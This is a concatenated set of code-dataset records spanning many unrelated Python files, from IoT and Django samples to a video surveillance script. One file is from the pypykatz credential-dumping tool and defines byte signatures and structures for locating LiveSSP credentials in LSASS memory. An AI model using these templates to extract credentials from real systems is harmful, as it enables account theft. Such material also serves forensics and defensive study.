msg.custom_properties[\"tornado-warning\"] = \"yes\"\n device_client.send_event(msg)\n time.sleep(1)\n\n# send only string messages\nfor i in range(5, 10):\n print(\"sending message #\" + str(i))\n device_client.send_event(\"test payload message \" + str(i))\n time.sleep(1)\n\n\n# finally, disconnect\ndevice_client.disconnect()\n","sub_path":"azure-iot-hub-devicesdk/samples/send_telemetry_device.py","file_name":"send_telemetry_device.py","file_ext":"py","file_size_in_byte":1801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"38843300","text":"from django import forms\nfrom .models import Article\n\n\nclass ArticleForm(forms.ModelForm):\n\n class Meta:\n\n model = Article\n\n fields = ('title', 'content',)\n\n widgets = {\n 'title': forms.TextInput(attrs={'class': 'form-control', }),\n 'content': forms.Textarea(attrs={'class': 'form-control', }),\n }\n\n def clean(self):\n\n data = self.cleaned_data\n title = data.get('title')\n qs = Article.objects.filter(title__icontains=title)\n if qs.exists():\n self.add_error('title', f'{title} is already in use')\n return data\n","sub_path":"src/articles/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"593693025","text":"\"\"\"Support for Meteoclimatic sensor.\"\"\"\nimport logging\n\nfrom homeassistant.components.sensor import SensorEntity\nfrom homeassistant.config_entries import ConfigEntry\nfrom homeassistant.const import ATTR_ATTRIBUTION\nfrom homeassistant.helpers.typing import HomeAssistantType\nfrom homeassistant.helpers.update_coordinator import (\n CoordinatorEntity,\n DataUpdateCoordinator,\n)\n\nfrom .const import (\n ATTRIBUTION,\n DOMAIN,\n MANUFACTURER,\n MODEL,\n SENSOR_TYPE_CLASS,\n SENSOR_TYPE_ICON,\n SENSOR_TYPE_NAME,\n SENSOR_TYPE_UNIT,\n SENSOR_TYPES,\n)\n\n_LOGGER = logging.getLogger(__name__)\n\n\nasync def async_setup_entry(\n hass: HomeAssistantType, entry: ConfigEntry, async_add_entities\n) -> None:\n \"\"\"Set up the Meteoclimatic sensor platform.\"\"\"\n coordinator = hass.data[DOMAIN][entry.entry_id]\n\n async_add_entities(\n [MeteoclimaticSensor(sensor_type, coordinator) for sensor_type in SENSOR_TYPES],\n False,\n )\n\n\nclass MeteoclimaticSensor(CoordinatorEntity, SensorEntity):\n \"\"\"Representation of a Meteoclimatic sensor.\"\"\"\n\n def __init__(self, sensor_type: str, coordinator: DataUpdateCoordinator) -> None:\n \"\"\"Initialize the Meteoclimatic sensor.\"\"\"\n super().__init__(coordinator)\n self._type = sensor_type\n station = self.coordinator.data[\"station\"]\n self._attr_device_class = SENSOR_TYPES[sensor_type].get(SENSOR_TYPE_CLASS)\n self._attr_icon = SENSOR_TYPES[sensor_type].get(SENSOR_TYPE_ICON)\n self._attr_name = (\n f\"{station.name} {SENSOR_TYPES[sensor_type][SENSOR_TYPE_NAME]}\"\n )\n self._attr_unique_id = f\"{station.code}_{sensor_type}\"\n self._attr_unit_of_measurement = SENSOR_TYPES[sensor_type].get(SENSOR_TYPE_UNIT)\n\n @property\n def device_info(self):\n \"\"\"Return the device info.\"\"\"\n return {\n \"identifiers\": {(DOMAIN, self.platform.config_entry.unique_id)},\n \"name\": self.coordinator.name,\n \"manufacturer\": MANUFACTURER,\n \"model\": MODEL,\n \"entry_type\": \"service\",\n }\n\n @property\n def state(self):\n \"\"\"Return the state of the sensor.\"\"\"\n return (\n getattr(self.coordinator.data[\"weather\"], self._type)\n if self.coordinator.data\n else None\n )\n\n @property\n def extra_state_attributes(self):\n \"\"\"Return the state attributes.\"\"\"\n return {ATTR_ATTRIBUTION: ATTRIBUTION}\n","sub_path":"homeassistant/components/meteoclimatic/sensor.py","file_name":"sensor.py","file_ext":"py","file_size_in_byte":2466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"99180703","text":"class Solution(object):\n def maxSubArray(self, nums):\n dp = [None]*len(nums)\n dp[0] = nums[0]\n m = nums[0]\n for i in range(1, len(nums)):\n n = nums[i]\n dp[i] = (dp[i-1] + n) if dp[i-1] > 0 else n\n print('max ', m)\n print('dp[i] ', dp[i])\n m = max(m, dp[i])\n return m\n\nprint( Solution().maxSubArray( [1,-2,3] ) )\n\n\"\"\"\npublic int maxSubArray(int[] A) {\n int n = A.length;\n int[] dp = new int[n];//dp[i] means the maximum subarray ending with A[i];\n dp[0] = A[0];\n int max = dp[0];\n\n for(int i = 1; i < n; i++){\n dp[i] = A[i] + (dp[i - 1] > 0 ? dp[i - 1] : 0);\n max = Math.max(max, dp[i]);\n }\n\n return max;\n}\n\"\"\"\n\"\"\"class Solution(object):\n m = None\n def helper(self, nums):\n l = len(nums)\n mid = int(l/2)\n print(nums)\n\n if l is 1:\n r = nums[0]\n self.m = max(r, self.m)\n return r\n else:\n r = self.helper(nums[:mid]) + self.helper(nums[mid:])\n self.m = max(r, self.m)\n return r\n\n def maxSubArray(self, nums):\n \"\"\"\"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\"\"\"\n self.m = nums[0]\n self.helper(nums)\n return self.m\n\nprint(Solution().maxSubArray([7, 4,-1,2,1]))\n\"\"\"\n","sub_path":"Python/53_Maximum_Subarray.py","file_name":"53_Maximum_Subarray.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"239970388","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n'''\nThis script dir-walks the TTC directory tree recording a md5sum file for files inside TTC courses folder\n'''\nimport codecs, os, sys\n \nfrom . import __init__\nfrom sha1classes.XmlSha1HexFileMod import XmlSha1HexFile\n\ndef walk_up_tree(folder_abspath):\n\n sha1counter = 0\n for dirpath, dirnames, filenames in os.walk(folder_abspath):\n print('-'*40)\n print('Walking', dirpath)\n os.chdir(dirpath)\n if len(filenames) == 0:\n continue\n filenames.sort()\n text = ''\n if os.path.isfile('z-sha1sum.txt'):\n f = codecs.open('z-sha1sum.txt','r','utf-8')\n text = f.read()\n f.close()\n for filename in filenames:\n if text.find(filename) > -1:\n continue\n comm = 'sha1sum \"%s\" >> z-sha1sum.txt' %filename\n sha1counter += 1\n print(sha1counter, comm)\n os.system(comm)\n\ndef process():\n ok_to_process = False\n try:\n folder_abspath = os.path.abspath(sys.argv[1])\n if os.path.isdir(folder_abspath):\n ok_to_process = True\n except IndexError:\n pass\n if ok_to_process:\n walk_up_tree(folder_abspath)\n return\n print('Please, give a valid path that will be downwards walked at creating sha1sum-files store folder by folder.')\n\n\nif __name__ == '__main__':\n process()\n #unittest.main()\n","sub_path":"shellclient/generateFlatSha1UpTree.py","file_name":"generateFlatSha1UpTree.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"379384728","text":"from js9 import j\nimport pickle\n\nJSBASE = j.application.jsbase_get_class()\n\n\nclass JS8Stub(JSBASE):\n\n def __init__(self):\n self.__jslocation__ = \"j.tools.js8stub\"\n JSBASE.__init__(self)\n self.loaded = None\n\n def generateStub(self, pickledfile=\"\", dest=\"/tmp/jscompl.py\"):\n with open(pickledfile, \"rb\") as f:\n self.loaded = pickle.load(f)\n with open(dest, \"w\") as f:\n tmpl = \"\"\n i = iter(self.loaded.items())\n c, v = next(i) # first one.\n tmpl += self.generate_class(v, 0)\n tmpl = tmpl.replace(\"\\t\", \" \") # replace tabs with spaces\n f.write(tmpl)\n\n def generate_class(self, info, level): # name, type, doc\n name, t, doc, objpath, filepath, extra = info\n # we got all the subclasses of this one\n # and foreach subclass we generate its template based on indenetation level as well\n generated_fields = self.generate_fields_for(\n objpath, level + 1).rstrip() or \"{spaces}\\tpass\".format(spaces=(level + 1) * \" \")\n tmpl = \"\"\n tmpl += \"\"\"\n{spaces}class {name}:\n{spaces}\\tr'''\n{spaces}{doc}\n{spaces}\\t'''\n{generated_fields}\n \"\"\".format(spaces=level * \" \", doc=doc, name=name, generated_fields=generated_fields)\n\n return tmpl\n\n def generate_fields_for(self, objpath, level=0):\n keys = sorted([k for k in self.loaded.keys() if objpath in k and k.count(\".\") - objpath.count(\".\") == 1])\n vals = [self.loaded[key] for key in keys]\n ret = \"\"\n for val in vals:\n\n if len(val) == 6:\n name, t, doc, objp, filepath, extra = val\n if t in (\"const\"):\n ret += self.generate_field(val, level)\n if t in (\"method\", \"property\"):\n ret += self.generate_method(val, level)\n if t in ('class'):\n ret += self.generate_innerclass(val, level)\n # import pudb; pu.db\n return ret\n\n def generate_innerclass(self, info, level):\n name, t, doc, objpath, filepath, extra = info\n generated_fields = self.generate_fields_for(objpath, level + 1).rstrip() or (level + 1) * \" \" + \"\\tpass\"\n\n tmpl = \"\"\"\n{spaces}class {name}:\n{generated_fields}\n \"\"\".format(spaces=(level) * \" \", name=name, generated_fields=generated_fields)\n return tmpl\n\n def generate_field(self, info, level):\n name, t, doc, objpath, filepath, extra = info\n return \"{spaces}{name} = None\\n\".format(spaces=\" \" * level, name=name)\n\n def generate_method(self, info, level):\n name, t, doc, objpath, filepath, extra = info\n if doc is not None:\n doc = doc.replace(\"'\", '\"')\n return \"\"\"\\n\n{spaces}@staticmethod\n{spaces}def {methodname}({methodargs}):\n{spaces}\\tr'''\n{spaces}{doc}\n{spaces}\\t'''\n{spaces}\\tpass\\n\"\"\".format(spaces=(level) * \" \", methodname=name, methodargs=extra or '', doc=doc)\n","sub_path":"JumpScale9Lib/tools/js8stub/JS8Stub.py","file_name":"JS8Stub.py","file_ext":"py","file_size_in_byte":2975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"337760801","text":"'''\nCreated on 01/07/2013\n\n@author: alasarr\n'''\nfrom api import app,auth\nfrom flask import jsonify,make_response,request\n\nfrom model.MPASModel import MPASModel\nfrom collections import OrderedDict\n\n\n@app.route('/mpas', methods = ['GET'])\ndef mpas():\n \n if not request.args:\n return make_response(jsonify( { \"error\": \"No parameters\" } ), 401)\n \n # check if group param exist\n if 'group' not in request.args:\n return make_response(jsonify( { 'error': 'Mandatory group param missing' } ), 400)\n \n # retrieve the order param\n group = request.args['group'] \n if group not in [\"country\", \"nogroup\"]:\n return make_response(jsonify( { 'error': 'Unknown group' } ), 400)\n\n # check lang parameter exist\n if \"language\" not in request.args:\n return make_response(jsonify( { \"error\": \"Mandatory language param missing\" } ), 400) \n \n language = request.args[\"language\"]\n \n # check if it's a valid language \n if language not in app.config[\"languages\"]:\n return make_response(jsonify( { 'error': 'Unknown language' } ), 400) \n \n #lat = request.args[\"lat\"]\n #lng = request.args[\"lng\"]\n #radio = request.args[\"radio\"]\n \n search = request.args.get('search',None)\n \n filter_networks = request.args.get('filter_networks',None)\n filter_networks = [filter_networks] if filter_networks else []\n\n mpas = MPASModel().getMPAS(language,search,filterNetworks=filter_networks)\n \n if group == \"country\":\n # insert mpas into a grouped dictionary \n groupMPAS = OrderedDict()\n for m in mpas:\n if groupMPAS.get(m[\"country\"]) == None:\n #create a list, this taxonomic is not defined \n groupMPAS[m[\"country\"]] = { \"country\" : m[\"country\"] , \"mpas\" : [] } \n \n tmp = { \"id\" : m[\"id_mpa\"].strip() , \"name\" : m[\"name\"] }\n groupMPAS[m[\"country\"]][\"mpas\"].append(tmp)\n \n # liberate memory from mpas list\n del mpas[0:len(mpas)]\n \n response = { \"results\" : groupMPAS.values() }\n \n else:\n #nogroup\n plainMPAS = []\n for m in mpas: \n tmp = { \"id\" : m[\"id_mpa\"].strip() , \"name\" : m[\"name\"] }\n plainMPAS.append(tmp)\n \n # liberate memory from mpas list\n del mpas[0:len(mpas)]\n \n response = { \"results\" : plainMPAS }\n \n return jsonify( response )\n\n@app.route('/mpas/', methods = ['GET'])\ndef get_mpa(id_mpa):\n # check lang parameter exist\n if \"language\" not in request.args:\n return make_response(jsonify( { \"error\": \"Mandatory language param missing\" } ), 400) \n \n language = request.args[\"language\"]\n \n # check if it's a valid language \n if language not in app.config[\"languages\"]:\n return make_response(jsonify( { 'error': 'Unknown language' } ), 400) \n \n mpa = MPASModel().getMPA(id_mpa,language)\n \n response = { \n \"id\" : mpa[\"id_mpa\"],\n \"name\" : mpa[\"name\"],\n \"country\" : mpa[\"country\"], \n \"marine_area\" : round(mpa[\"marine_area\"],1),\n \"land_area\" : round(mpa[\"land_area\"],1),\n \"lat\" : mpa[\"lat\"],\n \"lng\" : mpa[\"lng\"]\n }\n \n return jsonify( response )","sub_path":"src/api/mpas.py","file_name":"mpas.py","file_ext":"py","file_size_in_byte":3348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"589246938","text":"from bottle import request, response\nfrom bottle import post, get, route\nfrom user.user import User\nfrom connexion.connexion import ConnexionHandler\nfrom shotgun.shotgun import Shotgun\nfrom datetime import datetime\nfrom globals import file_to_json\n\n@get(\"/meta\")\ndef get_meta():\n \"\"\"\n Returns all static data when loading the app\n We don't use authenticate here because wwe don't need to be connected\n Therefore, we are checking if user is connected to get user info if there are\n :return: json meta for static data on app\n \"\"\"\n\n meta = {\n \"user\": {},\n \"shotgun_authorized\": Shotgun.check_time(),\n \"current_date\": datetime.now().strftime('%Y-%m-%d %H:%M:%S'),\n \"prices\": {}\n }\n auth = request.headers.get('Authorization')\n user_auth_inst = ConnexionHandler.is_authenticated(token=auth)\n\n response.status = 200\n response.headers['Content-Type'] = 'application/json'\n\n if user_auth_inst is None:\n return meta\n else:\n user = User.build_user_from_login(user_auth_inst[\"login\"])\n info_user = user.get_user_info()\n if info_user:\n meta[\"prices\"] = file_to_json('meta/prices.json')\n meta[\"user\"][\"info\"] = info_user\n meta[\"user\"][\"login\"] = user_auth_inst[\"login\"]\n meta[\"user\"][\"admin\"] = bool(user_auth_inst[\"admin\"])\n meta[\"user\"][\"auth\"] = True\n return meta","sub_path":"python/lib/webapis/meta.py","file_name":"meta.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"405234047","text":"#!/usr/bin/env python3\n#\n# Author:\n# Tamas Jos (@skelsec)\n#\nimport io\nimport logging\nfrom minidump.win_datatypes import *\nfrom pypykatz.commons.common import *\nfrom pypykatz.commons.win_datatypes import *\n\nclass LiveSspTemplate:\n\tdef __init__(self):\n\t\tself.signature = None\n\t\tself.first_entry_offset = None\n\t\tself.list_entry = None\n\t\t\t\nclass LIVESSP_DECRYPTOR_TEMPLATE:\n\tdef __init__(self, arch, buildnumber):\n\t\tself.arch = arch\n\t\tself.buildnumber = buildnumber\n\t\n\tdef get_template(self):\n\t\ttemplate = LiveSspTemplate()\n\t\ttemplate.list_entry = PKIWI_LIVESSP_LIST_ENTRY\n\t\t\n\t\tif self.arch == 'x64':\t\t\n\t\t\ttemplate.signature = b'\\x74\\x25\\x8b'\n\t\t\ttemplate.first_entry_offset = -7\n\t\t\t\n\t\t\n\t\telif self.arch == 'x86':\n\t\t\ttemplate.signature = b'\\x8b\\x16\\x39\\x51\\x24\\x75\\x08'\n\t\t\ttemplate.first_entry_offset = -8\n\t\t\t\n\t\telse:\n\t\t\traise Exception('Unknown architecture! %s' % self.arch)\n\n\t\t\t\n\t\treturn template\n\nclass PKIWI_LIVESSP_PRIMARY_CREDENTIAL(POINTER):\n\tdef __init__(self, reader):\n\t\tsuper().__init__(reader, KIWI_LIVESSP_PRIMARY_CREDENTIAL)\n\t\t\nclass KIWI_LIVESSP_PRIMARY_CREDENTIAL:\n\tdef __init__(self, reader):\n\t\tself.isSupp = ULONG(reader).value\n\t\tself.unk0 = ULONG(reader).value\n\t\tself.credentials = KIWI_GENERIC_PRIMARY_CREDENTIAL(reader)\n\n\nclass PKIWI_LIVESSP_LIST_ENTRY(POINTER):\n\tdef __init__(self, reader):\n\t\tsuper().__init__(reader, KIWI_LIVESSP_LIST_ENTRY)\n\t\t\nclass KIWI_LIVESSP_LIST_ENTRY:\n\tdef __init__(self, reader):\n\t\tself.Flink = PKIWI_LIVESSP_LIST_ENTRY(reader)\n\t\tself.Blink = PKIWI_LIVESSP_LIST_ENTRY(reader)\n\t\tself.unk0 = PVOID(reader)\n\t\tself.unk1 = PVOID(reader)\n\t\tself.unk2 = PVOID(reader)\n\t\tself.unk3 = PVOID(reader)\n\t\tself.unk4 = DWORD(reader).value\n\t\tself.unk5 = DWORD(reader).value\n\t\tself.unk6 = PVOID(reader)\n\t\tself.LocallyUniqueIdentifier = LUID(reader).value\n\t\tself.UserName = LSA_UNICODE_STRING(reader)\n\t\tself.unk7 = PVOID(reader)\n\t\tself.suppCreds = PKIWI_LIVESSP_PRIMARY_CREDENTIAL(reader)","sub_path":"pypykatz/lsadecryptor/packages/livessp/templates.py","file_name":"templates.py","file_ext":"py","file_size_in_byte":1912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"209155637","text":"#!/usr/bin/env python\n# -*- coding: utf8 -*-\n\nimport os\nimport atexit\n\nimport psycopg2\nimport cjson\n\n__all__ = [\"getTask\"]\n\nclass Task(object):\n\tconn = psycopg2.connect(host=\"services\", database=\"tdfplayer\", user=\"tdfplayer\")\n\tcursor = conn.cursor()\n\t@classmethod\n\tdef getTask(klass, taskID):\n\t\tklass.cursor.execute(\"\"\"\n\t\t\tSELECT taskid, name, inputdir, outputdir, audiopath\n\t\t\tFROM tasks\n\t\t\tWHERE taskid=%s\n\t\t\"\"\", (taskID,))\n\t\tklass.conn.commit()\n\t\tif klass.cursor.rowcount == 0:\n\t\t\treturn None\n\t\tr = klass.cursor.fetchone()\n\t\treturn Task(*r)\n\t@classmethod\n\tdef shutdown(klass):\n\t\tklass.conn.close()\n\tdef __init__(self, taskid, name, inputdir, outputdir, audiopath):\n\t\tself.taskid = taskid\n\t\tself.name = name\n\t\tself.inputdir = inputdir\n\t\tself.outputdir = outputdir\n\t\tself.audiopath = audiopath\n\tdef checkOutAFile(self, who, where):\n\t\tcursor = self.cursor\n\t\tcursor.execute(\"\"\"\n\t\t\tSELECT basename, filepath, login, ipaddress, checkout\n\t\t\tFROM tdffiles\n\t\t\tWHERE taskid=%s AND login=%s AND status='busy'\n\t\t\"\"\", (self.taskid, who))\n\t\tif cursor.rowcount > 0:\n\t\t\tbasename, filepath, login, ipaddress, checkout = cursor.fetchone()\n\t\t\toutput = os.path.join(self.outputdir, basename + \"_by_%s\" % who)\n\t\t\tcursor.connection.commit()\n\t\t\treturn cjson.encode(dict(\n\t\t\t\t\tmessage=\"file %s has been checked out by %s from %s at %s\" % (basename, login, ipaddress, checkout), \n\t\t\t\t\tinput=filepath, \n\t\t\t\t\toutput=output, \n\t\t\t\t))\n\n\t\tcursor.execute(\"\"\"\n\t\t\tUPDATE tdffiles\n\t\t\tSET status='busy', login=%s, ipaddress=%s, checkout=now()\n\t\t\tWHERE fileid=(\n\t\t\t\tSELECT fileid\n\t\t\t\tFROM tdffiles\n\t\t\t\tWHERE taskid=%s AND status='new'\n\t\t\t\tLIMIT 1)\n\t\t\tRETURNING basename, filepath\n\t\t\"\"\", (who, where, self.taskid))\n\t\tif cursor.rowcount == 0:\n\t\t\tcursor.connection.commit()\n\t\t\treturn cjson.encode(dict(error=\"no more files available in task %s\" % self.taskid))\n\n\t\tcursor.connection.commit()\n\t\t(basename, filepath,) = cursor.fetchone()\n\t\toutput = os.path.join(self.outputdir, basename + \"_by_%s\" % who)\n\t\treturn cjson.encode(dict(input=filepath, output=output))\n\n\tdef checkInAFile(self, who):\n\t\tcursor = self.cursor\n\t\tcursor.execute(\"\"\"\n\t\t\tSELECT fileid, basename\n\t\t\tFROM tdffiles\n\t\t\tWHERE taskid=%s AND status='busy' AND login=%s\n\t\t\"\"\", (self.taskid, who))\n\t\tif cursor.rowcount == 0:\n\t\t\tcursor.connection.commit()\n\t\t\treturn cjson.encode(dict(error=\"no file has been checked out by %s\" % who))\n\n\t\t(fileid, basename) = cursor.fetchone()\n\t\tofn = basename + \"_by_%s\" % who\n\t\tif not os.path.exists(os.path.join(self.outputdir, ofn)):\n\t\t\tcursor.connection.commit()\n\t\t\treturn cjson.encode(dict(error=\"output file %s not found in %s\" % (ofn, self.outputdir)))\n\n\t\tcursor.execute(\"\"\"\n\t\t\tUPDATE tdffiles\n\t\t\tSET checkin=now(), status='finished'\n\t\t\tWHERE fileid=%s\n\t\t\"\"\", (fileid,))\n\t\tcursor.connection.commit()\n\t\treturn cjson.encode(dict())\n\n\natexit.register(lambda: Task.shutdown())\n\ndef getTask(taskID):\n\treturn Task.getTask(taskID)\n\n","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":2887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"322257106","text":"from PyQt4 import QtGui, QtCore\nimport numpy as np\nfrom armature import *\nfrom math import pi\nfrom gradient_descent import *\n\n\nclass arm_widget(QtGui.QWidget):\n def __init__(self):\n super(arm_widget, self).__init__()\n\n self.draw_origin = np.array([0, 0, 0])\n self.test_armature = Arm(50, Parameter(0, pi), FixedParameter(0),\n Arm(50, Parameter(0, pi), FixedParameter(0),\n Arm(30, Parameter(0, pi / 4), FixedParameter(0),\n Arm(10, Parameter(0, pi / 4), FixedParameter(0)))))\n\n self.params = self.test_armature.min_parameters()\n self.target = np.array([0, 0, 0])\n\n self.pen = QtGui.QPen(QtCore.Qt.gray)\n self.pen.setWidth(8)\n\n # We have to wait until the window is show before we initialize window width and height\n def showEvent(self, e):\n self.resize_self()\n\n # Recalculate width and height if we resize\n def resizeEvent(self, QResizeEvent):\n super(arm_widget, self).resizeEvent(QResizeEvent)\n self.resize_self()\n\n def mouseMoveEvent(self, e):\n x = e.x()\n y = e.y()\n\n arr = np.array([x, 0, y]) - np.array([self.width() / 2, 0, self.height() / 1.1])\n\n if distance(arr, self.target) < 40:\n self.target = arr\n self.params = gradient_descent(self.test_armature, self.params, self.target, 10)\n self.repaint()\n\n def paintEvent(self, QPaintEvent):\n\n painter = QtGui.QPainter(self)\n painter.setPen(self.pen)\n\n self.pen.setColor(QtCore.Qt.red)\n self.pen.setWidth(5)\n painter.setPen(self.pen)\n painter.drawEllipse(QtCore.QPointF(self.target[::2][0] + self.draw_origin[::2][1],\n self.target[::2][1] + self.draw_origin[::2][0]), 10, 10)\n self.pen.setColor(QtCore.Qt.gray)\n self.pen.setWidth(8)\n painter.setPen(self.pen)\n\n unf_points = [point[::2] for point in self.test_armature.joints(self.params)]\n points = []\n\n for i in range(0, len(unf_points)):\n points.append(QtCore.QPointF(unf_points[i][0], unf_points[i][1]))\n points[i].setX(points[i].x() + self.draw_origin[::2][1])\n points[i].setY(points[i].y() + self.draw_origin[::2][0])\n\n for i in range(1, len(points)):\n self.flip_color(painter)\n painter.drawLine(points[i-1], points[i])\n\n def flip_color(self, painter):\n if self.pen.color() == QtCore.Qt.gray:\n self.pen.setColor(QtCore.Qt.black)\n painter.setPen(self.pen)\n else:\n self.pen.setColor(QtCore.Qt.gray)\n painter.setPen(self.pen)\n\n def resize_self(self):\n self.draw_origin = np.array([self.height() / 1.1, 0, self.width() / 2])\n\n","sub_path":"Prototyping/BaseStation/ui/ui_components/arm_viz/arm_widget.py","file_name":"arm_widget.py","file_ext":"py","file_size_in_byte":2806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"20268644","text":"# -*- coding: utf-8 -*-\n\"\"\"\nVGIS Group 843\nRita and Atanas\n\nSemester project\n\"\"\"\n\nimport cv2\nimport numpy as np\nimport helper\n\n# Videos\n#video = 'Caviar\\Fainting\\Rest_FallOnFloor.mpg'\nvideo = 'Caviar\\Fighting\\Fight_OneManDown.mpg'\n#video = 'Caviar\\Fighting\\Fight_RunAway1.mpg'\n#video = 'Caviar\\Walking\\Walk2.mpg'\n#video = 'Caviar\\Left_bags\\LeftBag.mp4'\n##video = 'Caviar\\Left_bags\\LeftBag_PickedUp.mp4'\n#video = 'Caviar\\Left_bags\\LeftBox.mp4'\n#video = 'Caviar\\Tracking\\Meet_WalkSplit.mp4'\n#video = 'Caviar\\Tracking\\Meet_WalkTogether2.mp4'\n#video = 'Caviar\\Loitering\\Browse_WhileWaiting2.mp4'\n\n\n\ncap = cv2.VideoCapture(video)\nwidth = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\nheight = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\nfps = int(cap.get(cv2.CAP_PROP_FPS))\n\n# get background image obtained through temporal median filter\nbackgroundImg = helper.get_background(video)\n\nnr_frame = 0\npredictions_list = []\nkalman_filters_list = []\nheights_list = [1]\nblob_id = [0]\nvel_data = dict()\npause = False\nwhile cap.isOpened():\n \n nr_frame += 1\n ret, frm = cap.read()\n if not ret:\n break\n if cv2.waitKey(25) & 0xFF==ord('q'):\n break\n \n gray = cv2.cvtColor(frm, cv2.COLOR_BGR2GRAY)\n gray = cv2.GaussianBlur(gray, (15, 15), 0)\n \n # detection of active pixels through difference between the background and\n # the current frame\n frameDiff = cv2.absdiff(backgroundImg, gray)\n \n thresh = cv2.threshold(frameDiff, 30, 255, cv2.THRESH_BINARY)[1]\n \n # removal of noise with median filter\n median = cv2.medianBlur(thresh, 15)\n \n kernel_eli = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (15,15))\n closing = cv2.morphologyEx(median, cv2.MORPH_CLOSE, kernel_eli)\n \n frame = cv2.cvtColor(closing, cv2.COLOR_GRAY2BGR)\n \n frame_tracks = frm.copy()\n \n # find contours in image\n img, contours, hierarchy = cv2.findContours(closing.copy(), cv2.RETR_TREE,\n cv2.CHAIN_APPROX_SIMPLE)\n \n candidates = []\n # merge blobs of same person, split in the segmentation\n if len(contours) > 0:\n candidates = helper.blob_fusion(contours, heights_list)\n \n \n people = np.empty((len(candidates), 4), int) \n for c in range(len(candidates)):\n x = candidates[c][0]\n y = candidates[c][1]\n w = candidates[c][2] - x\n h = candidates[c][3] - y\n people[c] = x, y, w, h\n \n \n # track people with kalman filter\n helper.kalman_filter_tracking(people, predictions_list, kalman_filters_list,\n fps, blob_id)\n \n \n # draw tracks on frame\n helper.draw_tracks(frame_tracks, predictions_list)\n \n \n # handle occlusions\n helper.handle_occlusion(frm, predictions_list, fps, kalman_filters_list)\n \n \n # every half second extract features\n if not nr_frame % int(fps/2):\n helper.extract_features(predictions_list, fps)\n \n \n for p in predictions_list:\n if p[14] != \"Fainting\" and p[1] == 0 and (p[6] == \"Person\" or p[6] == \"Still Person\"):\n h = p[3][-1][1]\n heights_list.append(h)\n \n \n # categorize blobs\n for detection in predictions_list:\n \n if detection[1] == 0:\n vel_thresh = 5\n x = detection[2][-1][0]\n y = detection[2][-1][1]\n vel = detection[4]\n category = detection[6]\n if detection[10] in vel_data:\n if len(vel_data[detection[10]]) > 5:\n vel_data[detection[10]].pop(0)\n else:\n vel_data[detection[10]].append([nr_frame, vel])\n else:\n vel_data[detection[10]] = [[nr_frame, vel]]\n\n if len(vel_data[detection[10]]) > 5:\n if helper.detect_running(vel_data[detection[10]], 23, 3):\n print('Suspicious Running')\n pause = True\n cv2.circle(frame, (x, y), 12, (0,255,255), 2)\n cv2.circle(frame_tracks, (x, y), 12, (0,255,255), 2)\n\n cv2.putText(frame, \"-\"+category+\" vel-\"+str(vel), \n (x+15,y-5), cv2.FONT_HERSHEY_PLAIN, 1, (255,255,255), 1)\n \n if category == \"Unknown\" and vel < vel_thresh:\n detection[6] = \"Object\"\n detection[8] = False\n detection[14] = \"\"\n elif (category == \"Unknown\" or category == \"Object\") and vel > vel_thresh:\n detection[6] = \"Person\"\n detection[8] = False\n detection[14] = \"\"\n elif category == \"Person\" and vel < vel_thresh:\n detection[6] = \"Still Person\"\n elif category == \"Still Person\" and vel > vel_thresh:\n detection[6] = \"Person\"\n \n \n # detect fainting or falling down\n helper.detect_fainting(predictions_list, heights_list)\n \n \n # find abandoned luggage and flag people\n helper.detect_abandoned_objects(predictions_list, fps) \n \n \n # detect people loitering\n helper.detect_loitering(predictions_list, fps)\n \n \n cv2.putText(frame,\"frame \"+str(nr_frame), (15,20), cv2.FONT_HERSHEY_PLAIN, 1, \n (255,255,255), 1)\n \n \n top_string = \"\"\n for p in predictions_list:\n if p[1] == 0:\n string = str(p[10])\n for b in p[11]:\n string += \",\" + str(b)\n \n cv2.putText(frame, string, (p[2][-1][0],p[2][-1][1]-5), \n cv2.FONT_HERSHEY_PLAIN, 1, (255,255,255), 1)\n cv2.putText(frame_tracks, string, (p[2][-1][0],p[2][-1][1]-5), \n cv2.FONT_HERSHEY_PLAIN, 1, (255,255,255), 2)\n \n x = p[2][-1][0]\n y = p[2][-1][1]\n w = p[3][-1][0]\n h = p[3][-1][1]\n if p[8]:\n cv2.rectangle(frame, (x,y), (x+w,y+h), (0,0,255), 2) \n cv2.rectangle(frame_tracks, (x,y), (x+w,y+h), (0,0,255), 2) \n if p[14] != \"\":\n top_string += (\"-\" + p[14])\n else:\n cv2.rectangle(frame, (x,y), (x+w,y+h), (0,255,0), 2) \n cv2.rectangle(frame_tracks, (x,y), (x+w,y+h), (0,255,0), 2)\n \n \n if top_string == \"\":\n color = (0,255,0)\n else:\n color = (0,0,255)\n cv2.rectangle(frame_tracks, (0,0), (width,20), color, -1)\n cv2.putText(frame_tracks, top_string, (0,15), \n cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255,255,255), 1)\n \n\n display = np.hstack((frame_tracks,frame))\n cv2.imshow(\"Frame\", display)\n if pause:\n cv2.waitKey(0)\n pause=False\n \n 